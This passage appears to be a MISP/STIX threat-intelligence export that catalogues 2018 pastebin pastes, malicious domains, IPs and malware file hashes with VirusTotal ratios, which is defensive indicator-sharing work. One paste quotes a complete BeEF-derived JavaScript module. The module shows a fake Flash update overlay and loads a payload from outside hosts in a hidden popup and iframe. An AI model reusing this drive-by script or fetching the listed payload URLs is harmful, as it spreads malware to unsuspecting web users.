"value": "scan.vfk2k5s5tfjr27tz.tk\r\nscan.blockbitcoin.tkh",
|
|
"category": "Other",
|
|
"uuid": "5ba1d5ac-4b4c-486a-88ee-4b38950d210f"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "username",
|
|
"value": "wfkfly",
|
|
"category": "Other",
|
|
"uuid": "5ba1d5ac-4dd0-4d93-b667-4d80950d210f"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "origin",
|
|
"value": "pastebin.com",
|
|
"category": "Other",
|
|
"uuid": "5ba1d5ad-9e90-4225-99a2-4679950d210f"
|
|
},
|
|
{
|
|
"type": "url",
|
|
"object_relation": "url",
|
|
"value": "https://pastebin.com/raw/Xu74Mzif",
|
|
"category": "Network activity",
|
|
"to_ids": true,
|
|
"uuid": "5ba1d5ad-17d8-4d8b-8b63-4f23950d210f"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "paste"
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--5ba1d60a-9f28-434d-b03a-4b86950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:52:26.000Z",
|
|
"modified": "2018-09-19T04:52:26.000Z",
|
|
"labels": [
|
|
"misp:name=\"paste\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "text",
|
|
"object_relation": "paste",
|
|
"value": "142.44.215.177\r\n144.217.61.147",
|
|
"category": "Other",
|
|
"uuid": "5ba1d60a-82f8-486e-99d5-4580950d210f"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "username",
|
|
"value": "wfkfly",
|
|
"category": "Other",
|
|
"uuid": "5ba1d60b-7de0-4efe-bb0b-44ca950d210f"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "origin",
|
|
"value": "pastebin.com",
|
|
"category": "Other",
|
|
"uuid": "5ba1d60b-8bb8-4e7a-a466-40fc950d210f"
|
|
},
|
|
{
|
|
"type": "url",
|
|
"object_relation": "url",
|
|
"value": "https://pastebin.com/raw/rBHjTZY6",
|
|
"category": "Network activity",
|
|
"to_ids": true,
|
|
"uuid": "5ba1d60b-8930-46d0-a00b-4dc6950d210f"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "paste"
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--5ba1d673-e378-45e9-9d50-41c6950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:54:11.000Z",
|
|
"modified": "2018-09-19T04:54:11.000Z",
|
|
"labels": [
|
|
"misp:name=\"paste\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "text",
|
|
"object_relation": "paste",
|
|
"value": "//\r\n// Copyright (c) 2006-2018 Wade Alcorn - wade@bindshell.net\r\n// Browser Exploitation Framework (BeEF) - http://beefproject.com\r\n// See the file 'doc/COPYING' for copying permission\r\n//\r\n\r\n // Module Configurations\r\nvar image = \"http://d20blzxlz9ydha.cloudfront.net/flash.png\";\r\nvar payload_type = \"Custom_Payload\";\r\nvar payload_uri = \"http://update.pythonanywhere.com/d\";\r\n\r\n//var beef_root = beef.net.httpproto + \"://\" + beef.net.host + \":\" + beef.net.port;\r\nvar payload = \"\";\r\n\r\n// Function to gray out the screen\r\nvar grayOut = function(vis, options) {\r\nvar options = options || {};\r\nvar zindex = options.zindex || 50;\r\nvar opacity = options.opacity || 70;\r\nvar opaque = (opacity / 100);\r\nvar bgcolor = options.bgcolor || '#000000';\r\nvar dark=document.getElementById('darkenScreenObject');\r\nif (!dark) {\r\n var tbody = document.getElementsByTagName(\"body\")[0];\r\n var tnode = document.createElement('div');\r\n tnode.style.position='absolute';\r\n tnode.style.top='0px';\r\n tnode.style.left='0px';\r\n tnode.style.overflow='hidden';\r\n tnode.style.display='none';\r\n tnode.id='darkenScreenObject';\r\n tbody.appendChild(tnode);\r\n dark=document.getElementById('darkenScreenObject');\r\n}\r\nif (vis) {\r\n var pageWidth='100%';\r\n var pageHeight='100%';\r\n dark.style.opacity=opaque;\r\n dark.style.MozOpacity=opaque;\r\n dark.style.filter='alpha(opacity='+opacity+')';\r\n dark.style.zIndex=zindex;\r\n dark.style.backgroundColor=bgcolor;\r\n dark.style.width= pageWidth;\r\n dark.style.height= pageHeight;\r\n dark.style.display='block';\r\n} else {\r\n dark.style.display='none';\r\n}\r\n};\r\n\r\n\r\n// Payload Configuration\r\nswitch (payload_type) {\r\n\tcase \"Custom_Payload\":\r\n\t payload = payload_uri;\r\n\tbreak;\r\n\tcase \"Firefox_Extension\":\r\n\t //payload = beef_root + \"/api/ipec/ff_extension\";\r\n\t break;\r\n\tdefault:\r\n\t //beef.net.send('<%= @command_url %>', <%= @command_id %>, 'error=payload not selected');\r\n\t break;\r\n}\r\n\r\n// Create DIV\r\nvar flashdiv = document.createElement('div');\r\nflashdiv.setAttribute('id', 'flashDiv');\r\nflashdiv.setAttribute('style', 'position:absolute; top:20%; left:30%; z-index:51;');\r\nflashdiv.setAttribute('align', 'center');\r\nvar id = setInterval(frame, 100);\r\nfunction frame() {\r\n\tif (document.body.appendChild(flashdiv)) {\r\n\t\t// window.open is very useful when using data URI vectors and the IFrame/Object tag\r\n\t\t// also, as the user is clicking on the link, the new tab opener is not blocked by the browser.\r\n\t\tflashdiv.innerHTML = \"<a href=\\\"\" + payload + \"\\\" target=\\\"_blank\\\" ><img src=\\\"\" + image + \"\\\" /></a>\";\r\n\r\n\t\t// gray out the background\r\n\t\tgrayOut(true,{'opacity':'30'});\r\n\r\n\t\t// clean up on click\r\n\t\tdocument.getElementById(\"flashDiv\").onclick = function(){\r\n\t\t\tdocument.body.removeChild(flashdiv);\r\n\t\t\tgrayOut(false,{'opacity':'0'});\r\n\t\t\tdocument.body.removeChild(document.getElementById('darkenScreenObject'));\r\n\t\t\taa=window.open(\"http://dzebppteh32lz.cloudfront.net/c\",'popUpWindow','height=1,width=1,top=0,left=0,resizable=no,scrollbars=no,toolbar=no,menubar=no,location=no,directories=no,status=no')\r\n\t\t\t//aa=window.openwindow.open(\"http://d3lvemwrafj7a7.cloudfront.net/e\",'_blank', 'toolbar=no,status=no,menubar=no,scrollbars=no,resizable=no,left=10000, top=10000, width=10, height=10', ''); \r\n\t\t\taa.moveTo(10000,10000);\r\n\t\t\t//window.open(\"http://update.pythonanywhere.com/d\");\r\n\t\t\tvar iframe = document.createElement('iframe');\r\n\t\t\tiframe.style.display = \"none\";\r\n\t\t\tiframe.src = \"http://update.pythonanywhere.com/d\";\r\n\t\t\tdocument.body.appendChild(iframe);\r\n\t\t\t\r\n\t\t}\r\n\t clearInterval(id);\r\n\t} \r\n}",
|
|
"category": "Other",
|
|
"uuid": "5ba1d673-8450-46fa-bc4e-4243950d210f"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "username",
|
|
"value": "wfkfly",
|
|
"category": "Other",
|
|
"uuid": "5ba1d674-5500-4354-b426-4bad950d210f"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "origin",
|
|
"value": "pastebin.com",
|
|
"category": "Other",
|
|
"uuid": "5ba1d674-e264-47fd-a089-449e950d210f"
|
|
},
|
|
{
|
|
"type": "url",
|
|
"object_relation": "url",
|
|
"value": "https://pastebin.com/raw/AbhwC1Ki",
|
|
"category": "Network activity",
|
|
"to_ids": true,
|
|
"uuid": "5ba1d674-f124-48c8-95ff-4bb8950d210f"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "paste"
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--5ba1d6ce-de54-4d15-8134-27c3950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:55:42.000Z",
|
|
"modified": "2018-09-19T04:55:42.000Z",
|
|
"labels": [
|
|
"misp:name=\"paste\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "text",
|
|
"object_relation": "paste",
|
|
"value": "https://daknobcq4zal6vbm.tk/m.exe;",
|
|
"category": "Other",
|
|
"uuid": "5ba1d6ce-d1e4-4362-a7ac-27c3950d210f"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "username",
|
|
"value": "wfkfly",
|
|
"category": "Other",
|
|
"uuid": "5ba1d6cf-498c-4df8-b61f-27c3950d210f"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "origin",
|
|
"value": "pastebin.com",
|
|
"category": "Other",
|
|
"uuid": "5ba1d6cf-7928-4e3e-9e52-27c3950d210f"
|
|
},
|
|
{
|
|
"type": "url",
|
|
"object_relation": "url",
|
|
"value": "https://pastebin.com/R5q9wvHw",
|
|
"category": "Network activity",
|
|
"to_ids": true,
|
|
"uuid": "5ba1d6cf-6ac4-4e0e-a8e7-27c3950d210f"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "paste"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--9fb96957-5ea7-449a-bbd2-ff71922b5a6e",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:02.000Z",
|
|
"modified": "2018-09-19T05:21:02.000Z",
|
|
"pattern": "[file:hashes.MD5 = '33357485c5c92f087bd53602d6d8a48b' AND file:hashes.SHA1 = '7403a54aa5ff712a8614e6a90398322d5fa7ba89' AND file:hashes.SHA256 = '5b790f02bdb26b6b6b270a5669311b4f231d17872aafb237b7e87b6bbb57426d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T05:21:02Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--7c26518e-fa7a-453f-a4cd-e234d2520d3e",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:01.000Z",
|
|
"modified": "2018-09-19T05:21:01.000Z",
|
|
"labels": [
|
|
"misp:name=\"virustotal-report\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "datetime",
|
|
"object_relation": "last-submission",
|
|
"value": "2018-09-18T19:28:42",
|
|
"category": "Other",
|
|
"uuid": "cbf68cfc-a53a-4a67-b043-d514ef6c251a"
|
|
},
|
|
{
|
|
"type": "link",
|
|
"object_relation": "permalink",
|
|
"value": "https://www.virustotal.com/file/5b790f02bdb26b6b6b270a5669311b4f231d17872aafb237b7e87b6bbb57426d/analysis/1537298922/",
|
|
"category": "External analysis",
|
|
"uuid": "d17c47a6-5c9e-4b65-97a1-ecd5dd083c82"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "detection-ratio",
|
|
"value": "9/53",
|
|
"category": "Other",
|
|
"uuid": "6f915503-6a42-4a44-8ba4-a563bb038e7d"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "virustotal-report"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--d33ee6ee-437e-4ce5-ab11-837fee0edc8c",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:05.000Z",
|
|
"modified": "2018-09-19T05:21:05.000Z",
|
|
"pattern": "[file:hashes.MD5 = '1de7ceb3434243aa94296393165f89e7' AND file:hashes.SHA1 = '67a12afbe6751418141284716235a6b27c17443a' AND file:hashes.SHA256 = '725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T05:21:05Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--6836f38c-a2eb-4f7c-9055-2ffb96e7c45e",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:03.000Z",
|
|
"modified": "2018-09-19T05:21:03.000Z",
|
|
"labels": [
|
|
"misp:name=\"virustotal-report\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "datetime",
|
|
"object_relation": "last-submission",
|
|
"value": "2018-09-19T03:31:22",
|
|
"category": "Other",
|
|
"uuid": "a7862599-832b-4ba2-ab1c-b1a320c1a4ad"
|
|
},
|
|
{
|
|
"type": "link",
|
|
"object_relation": "permalink",
|
|
"value": "https://www.virustotal.com/file/725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054/analysis/1537327882/",
|
|
"category": "External analysis",
|
|
"uuid": "abcf84f8-0717-443f-b190-4c623df3933d"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "detection-ratio",
|
|
"value": "26/58",
|
|
"category": "Other",
|
|
"uuid": "c306e374-13a0-4f9e-956c-e55fe50a8c97"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "virustotal-report"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--edd4b990-82be-4e5e-858f-50bbd7222f03",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:07.000Z",
|
|
"modified": "2018-09-19T05:21:07.000Z",
|
|
"pattern": "[file:hashes.MD5 = 'f8c7e23c71478aa99dc3627da989b2ca' AND file:hashes.SHA1 = 'e41d26b124c21b2c82b77194ed6be6ee8281410a' AND file:hashes.SHA256 = 'dbc380cbfb1536dfb24ef460ce18bccdae549b4585ba713b5228c23924385e54']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T05:21:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--54646fe4-9b9d-470a-9042-d446a90a15a5",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:05.000Z",
|
|
"modified": "2018-09-19T05:21:05.000Z",
|
|
"labels": [
|
|
"misp:name=\"virustotal-report\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "datetime",
|
|
"object_relation": "last-submission",
|
|
"value": "2018-09-18T20:07:10",
|
|
"category": "Other",
|
|
"uuid": "f8ac3222-2b8a-49c6-b107-f22538e9f3f9"
|
|
},
|
|
{
|
|
"type": "link",
|
|
"object_relation": "permalink",
|
|
"value": "https://www.virustotal.com/file/dbc380cbfb1536dfb24ef460ce18bccdae549b4585ba713b5228c23924385e54/analysis/1537301230/",
|
|
"category": "External analysis",
|
|
"uuid": "193bbd5f-b6bd-43bc-b1f7-f75586c795ad"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "detection-ratio",
|
|
"value": "10/58",
|
|
"category": "Other",
|
|
"uuid": "2240f3fb-744f-48a4-8918-f9c428c4d465"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "virustotal-report"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--33e723b8-2142-46a4-8eae-c311211ea8a0",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:09.000Z",
|
|
"modified": "2018-09-19T05:21:09.000Z",
|
|
"pattern": "[file:hashes.MD5 = '9d080aa27da74e146a45b56c86476f20' AND file:hashes.SHA1 = '115bda02fd2807bd0e9645656c378bf1b145b4b8' AND file:hashes.SHA256 = 'dcd37e5b266cc0cd3fab73caa63b218f5b92e9bd5b25cf1cacf1afdb0d8e76ff']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T05:21:09Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--87558dd2-f70c-49b7-b710-6666909e0e91",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:08.000Z",
|
|
"modified": "2018-09-19T05:21:08.000Z",
|
|
"labels": [
|
|
"misp:name=\"virustotal-report\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "datetime",
|
|
"object_relation": "last-submission",
|
|
"value": "2018-09-18T11:41:09",
|
|
"category": "Other",
|
|
"uuid": "3d949d3f-cbed-49eb-b6d4-76efa21d3605"
|
|
},
|
|
{
|
|
"type": "link",
|
|
"object_relation": "permalink",
|
|
"value": "https://www.virustotal.com/file/dcd37e5b266cc0cd3fab73caa63b218f5b92e9bd5b25cf1cacf1afdb0d8e76ff/analysis/1537270869/",
|
|
"category": "External analysis",
|
|
"uuid": "120a5e8e-d241-45d1-a52a-b20a69c69c21"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "detection-ratio",
|
|
"value": "21/58",
|
|
"category": "Other",
|
|
"uuid": "6522271c-6206-43b8-bed9-2ee6b928da31"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "virustotal-report"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--d88b602b-394b-4c46-92fd-b776ed9ef8d9",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:12.000Z",
|
|
"modified": "2018-09-19T05:21:12.000Z",
|
|
"pattern": "[file:hashes.MD5 = '2d39b1792b263eba084e10c54e053d84' AND file:hashes.SHA1 = '1468eac59bd43901de82389276bded18202f799f' AND file:hashes.SHA256 = 'f808a42b10cf55603389945a549ce45edc6a04562196d14f7489af04688f12bc']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T05:21:12Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--3df3df12-3458-48cc-9031-686fefeaf564",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:10.000Z",
|
|
"modified": "2018-09-19T05:21:10.000Z",
|
|
"labels": [
|
|
"misp:name=\"virustotal-report\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "datetime",
|
|
"object_relation": "last-submission",
|
|
"value": "2018-09-18T18:34:30",
|
|
"category": "Other",
|
|
"uuid": "9c2f0268-084d-401f-a118-859baa7da926"
|
|
},
|
|
{
|
|
"type": "link",
|
|
"object_relation": "permalink",
|
|
"value": "https://www.virustotal.com/file/f808a42b10cf55603389945a549ce45edc6a04562196d14f7489af04688f12bc/analysis/1537295670/",
|
|
"category": "External analysis",
|
|
"uuid": "92b34d76-149f-4fab-a1c0-3d1fab052d39"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "detection-ratio",
|
|
"value": "15/58",
|
|
"category": "Other",
|
|
"uuid": "7c1e81fd-a762-4c8c-910f-e10d7da374bd"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "virustotal-report"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--93747f03-1eec-47e4-82bc-29b8356a4961",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:14.000Z",
|
|
"modified": "2018-09-19T05:21:14.000Z",
|
|
"pattern": "[file:hashes.MD5 = '7b5008d312465307905d96b4b8366326' AND file:hashes.SHA1 = 'a0a5d9fc4ce11f9069a64229cef52ba707027546' AND file:hashes.SHA256 = '0b9c54692d25f68ede1de47d4206ec3cd2e5836e368794eccb3daa632334c641']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T05:21:14Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--59d3e161-919f-486a-bb7b-f4010360c91c",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:12.000Z",
|
|
"modified": "2018-09-19T05:21:12.000Z",
|
|
"labels": [
|
|
"misp:name=\"virustotal-report\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "datetime",
|
|
"object_relation": "last-submission",
|
|
"value": "2018-09-19T05:11:59",
|
|
"category": "Other",
|
|
"uuid": "344f34ab-206c-4ca6-857f-f038049eeca8"
|
|
},
|
|
{
|
|
"type": "link",
|
|
"object_relation": "permalink",
|
|
"value": "https://www.virustotal.com/file/0b9c54692d25f68ede1de47d4206ec3cd2e5836e368794eccb3daa632334c641/analysis/1537333919/",
|
|
"category": "External analysis",
|
|
"uuid": "b42f45b5-2c58-4b38-a615-c6c66fd48dcb"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "detection-ratio",
|
|
"value": "10/58",
|
|
"category": "Other",
|
|
"uuid": "647a2027-5c6b-4ee2-a934-fe17edc10ae7"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "virustotal-report"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--a1f90b96-d2ce-46d4-a059-5efedbb57e07",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:16.000Z",
|
|
"modified": "2018-09-19T05:21:16.000Z",
|
|
"pattern": "[file:hashes.MD5 = 'e158c98a90cc7b14d026443cbcd8b520' AND file:hashes.SHA1 = '0c00df2bee83f9f7c6f2be3d9dd7557e9410a579' AND file:hashes.SHA256 = 'a27acc07844bb751ac33f5df569fd949d8b61dba26eb5447482d90243fc739af']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T05:21:16Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--7b042050-b92e-404c-87e8-107c8986e1d7",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:15.000Z",
|
|
"modified": "2018-09-19T05:21:15.000Z",
|
|
"labels": [
|
|
"misp:name=\"virustotal-report\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "datetime",
|
|
"object_relation": "last-submission",
|
|
"value": "2018-09-18T18:31:13",
|
|
"category": "Other",
|
|
"uuid": "3eecf2ce-db49-433d-8296-a664cf52841e"
|
|
},
|
|
{
|
|
"type": "link",
|
|
"object_relation": "permalink",
|
|
"value": "https://www.virustotal.com/file/a27acc07844bb751ac33f5df569fd949d8b61dba26eb5447482d90243fc739af/analysis/1537295473/",
|
|
"category": "External analysis",
|
|
"uuid": "5e7593ee-fbb7-411a-8578-ed90875953e3"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "detection-ratio",
|
|
"value": "14/58",
|
|
"category": "Other",
|
|
"uuid": "585e2605-9a59-4405-b604-1d36a87903e8"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "virustotal-report"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--45a9a837-c3c8-436c-a546-30547955ba2c",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:19.000Z",
|
|
"modified": "2018-09-19T05:21:19.000Z",
|
|
"pattern": "[file:hashes.MD5 = '3b5baecd61190e12a526c51d5ecccbbe' AND file:hashes.SHA1 = '422288eb6941cee899c1046ccfcd94681b36230a' AND file:hashes.SHA256 = 'f888dda9ca1876eba12ffb55a7a993bd1f5a622a30045a675da4955ede3e4cb8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T05:21:19Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--6beca7d0-c2fe-4742-b58a-014a7f542862",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:17.000Z",
|
|
"modified": "2018-09-19T05:21:17.000Z",
|
|
"labels": [
|
|
"misp:name=\"virustotal-report\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "datetime",
|
|
"object_relation": "last-submission",
|
|
"value": "2018-09-19T03:31:11",
|
|
"category": "Other",
|
|
"uuid": "f817657f-fa64-46b2-83d0-5baddd55e755"
|
|
},
|
|
{
|
|
"type": "link",
|
|
"object_relation": "permalink",
|
|
"value": "https://www.virustotal.com/file/f888dda9ca1876eba12ffb55a7a993bd1f5a622a30045a675da4955ede3e4cb8/analysis/1537327871/",
|
|
"category": "External analysis",
|
|
"uuid": "8e6ad2e0-623d-4a80-a8d1-9fd46979f486"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "detection-ratio",
|
|
"value": "10/58",
|
|
"category": "Other",
|
|
"uuid": "1605e2ae-c2cb-4ec7-83b8-eae5be80768c"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "virustotal-report"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--d3df327a-fc5e-422f-a7a1-56849a91787a",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:21.000Z",
|
|
"modified": "2018-09-19T05:21:21.000Z",
|
|
"pattern": "[file:hashes.MD5 = '50ab7c696ca74e8ae322855d445e0613' AND file:hashes.SHA1 = 'b8b0226fb4f945b68d222c62ebb02f00874f379c' AND file:hashes.SHA256 = 'de63ce4a42f06a5903b9daa62b67fcfbdeca05beb574f966370a6ae7fd21190d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T05:21:21Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
